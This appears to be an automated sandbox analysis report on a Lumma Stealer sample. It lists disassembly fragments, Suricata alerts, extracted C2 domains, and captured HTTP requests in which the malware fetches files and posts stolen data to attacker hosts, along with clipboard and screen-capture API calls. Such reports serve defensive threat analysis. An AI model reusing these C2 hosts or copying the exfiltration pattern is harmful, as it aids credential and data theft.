Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h	1_2_007D23C0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [edi], cx	1_2_007D23C0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	1_2_007D9BB2
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_007D9BB2
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_007C4460
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_007C4460
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_007E7C60
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_007CEC10
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov edi, ecx	1_2_007CB412
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_007DB4F0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	1_2_007DCCE0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov ecx, eax	1_2_007EE4C4
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov dword ptr [esp+02h], 4AFD8706h	1_2_007EE4C4
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_007CBCC0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-23C15DBAh]	1_2_007F0480
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx]	1_2_007EB546
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov ebx, ecx	1_2_007D5629
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_007C56E3
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-04h]	1_2_007C56E3
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then jmp ecx	1_2_007D56A0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_007D9F40
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 4x nop then mov edx, ecx	1_2_007EEF05

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.67.165:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: leggelatez.lat
Source: Malware configuration extractor	URLs: savorraiykj.lat
Source: Malware configuration extractor	URLs: bloodyswif.lat
Source: Malware configuration extractor	URLs: washyceehsu.lat
Source: Malware configuration extractor	URLs: shoefeatthe.lat
Source: Malware configuration extractor	URLs: miniatureyu.lat
Source: Malware configuration extractor	URLs: kickykiduz.lat
Source: Malware configuration extractor	URLs: burnressert.shop
Source: Malware configuration extractor	URLs: finickypwk.lat

Source: Joe Sandbox View

IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.67.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.15.122:443

Source: global traffic	HTTP traffic detected: GET /iqqhm.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: u1.grapplereturnunstamped.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PHOIPRK3552WM55User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18146Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZD3Z1B11LCY5UU31User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8773Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MLZXBBUVVOFFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V18JV9QKDD1QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1394Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MMJP71ZYJPJBGMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1085Host: burnressert.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: burnressert.shop
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /iqqhm.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: u1.grapplereturnunstamped.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: u1.grapplereturnunstamped.shop
Source: global traffic	DNS traffic detected: DNS query: burnressert.shop
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipgonuh.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: burnressert.shop

Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1955462993.0000000004B44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1955462993.0000000004B27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1955462993.0000000004B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: lummm_lzmb.exe, 00000001.00000002.1954673300.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/D1Q
Source: lummm_lzmb.exe, 00000001.00000002.1953703961.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/api
Source: lummm_lzmb.exe, 00000001.00000002.1954673300.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/apibu
Source: lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt4l
Source: lummm_lzmb.exe, 00000001.00000002.1954673300.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtnbF3
Source: powershell.exe, 00000005.00000002.1953315798.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1953180738.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1954311872.0000000000C90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000005.00000002.1955462993.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/
Source: lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt
Source: lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt0
Source: lummm_lzmb.exe, 00000001.00000002.1954539384.0000000000C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txtv
Source: lummm_lzmb.exe, 00000001.00000002.1954001476.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop:443/int_clp_sha.txtstem32C:10.0.19045C:
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: lummm_lzmb.exe, 00000000.00000002.1723635438.0000000003EB6000.00000004.00000800.00020000.00000000.sdmp, lummm_lzmb.exe, 00000000.00000002.1730655799.0000000006E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://u1.grapplereturnunstamped.shop
Source: lummm_lzmb.exe, 00000000.00000002.1714027294.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://u1.grapplereturnunstamped.shop/iqqhm.dat

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.78.33:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Code function: 1_2_007E5630 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_007E5630

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Code function: 1_2_007E5630 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_007E5630

Source: C:\Users\user\Desktop\lummm_lzmb.exe

Code function: 1_2_007E5B65 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_007E5B65

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_07512788 NtResumeThread,		0_2_07512788
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_07512780 NtResumeThread,		0_2_07512780

Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012BA150	0_2_012BA150
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012BAB68	0_2_012BAB68
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012B1FB0	0_2_012B1FB0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012BB868	0_2_012BB868
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012BB5F3	0_2_012BB5F3
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012BB728	0_2_012BB728
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_012BB6FF	0_2_012BB6FF
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_056E091D	0_2_056E091D
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_0758F3A0	0_2_0758F3A0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_0758F668	0_2_0758F668
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_07570040	0_2_07570040
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 0_2_07570027	0_2_07570027
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F1810	1_2_007F1810
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007BB000	1_2_007BB000
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C20B0	1_2_007C20B0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007EA140	1_2_007EA140
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DD9A2	1_2_007DD9A2
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007BDA68	1_2_007BDA68
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D1380	1_2_007D1380
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D7C70	1_2_007D7C70
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0ED0	1_2_007F0ED0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D4F7F	1_2_007D4F7F
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B9770	1_2_007B9770
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B8750	1_2_007B8750
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C7FA6	1_2_007C7FA6
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007ED870	1_2_007ED870
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B5860	1_2_007B5860
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DE063	1_2_007DE063
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CE840	1_2_007CE840
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CF040	1_2_007CF040
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E2826	1_2_007E2826
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DF0D4	1_2_007DF0D4
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CC8B0	1_2_007CC8B0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B38A0	1_2_007B38A0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B6150	1_2_007B6150
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D8130	1_2_007D8130
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CB10E	1_2_007CB10E
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DA9E0	1_2_007DA9E0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C61DE	1_2_007C61DE
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E99D0	1_2_007E99D0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D5990	1_2_007D5990
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B8A70	1_2_007B8A70
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F1270	1_2_007F1270
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B4250	1_2_007B4250
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D8248	1_2_007D8248
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E3200	1_2_007E3200
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B2AD0	1_2_007B2AD0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E0AC5	1_2_007E0AC5
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D1AB0	1_2_007D1AB0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0370	1_2_007F0370
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E835F	1_2_007E835F
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007BAB40	1_2_007BAB40
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007EB310	1_2_007EB310
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B9300	1_2_007B9300
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CD300	1_2_007CD300
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D5B00	1_2_007D5B00
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C8B02	1_2_007C8B02
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D73F0	1_2_007D73F0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B73C0	1_2_007B73C0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D9BB2	1_2_007D9BB2
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D8B9E	1_2_007D8B9E
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D4392	1_2_007D4392
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C738A	1_2_007C738A
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B4B80	1_2_007B4B80
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007BEB80	1_2_007BEB80
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C4460	1_2_007C4460
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B8C50	1_2_007B8C50
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C6435	1_2_007C6435
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CB412	1_2_007CB412
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0C00	1_2_007F0C00
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C1CF1	1_2_007C1CF1
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CBCC0	1_2_007CBCC0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CACC3	1_2_007CACC3
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DFC80	1_2_007DFC80
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0480	1_2_007F0480
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CC560	1_2_007CC560
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D0560	1_2_007D0560
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E3560	1_2_007E3560
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F1560	1_2_007F1560
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E1D51	1_2_007E1D51
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007EB546	1_2_007EB546
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DD530	1_2_007DD530
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F05F0	1_2_007F05F0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B65E0	1_2_007B65E0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CA5DB	1_2_007CA5DB
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007DADCA	1_2_007DADCA
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CD590	1_2_007CD590
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007EAD90	1_2_007EAD90
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007CCE30	1_2_007CCE30
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D5629	1_2_007D5629
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E2E1D	1_2_007E2E1D
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007C56E3	1_2_007C56E3
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007D56A0	1_2_007D56A0
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007B2E90	1_2_007B2E90
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007F0690	1_2_007F0690
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E3E8A	1_2_007E3E8A
Source: C:\Users\user\Desktop\lummm_lzmb.exe	Code function: 1_2_007E9770	1_2_007E9770
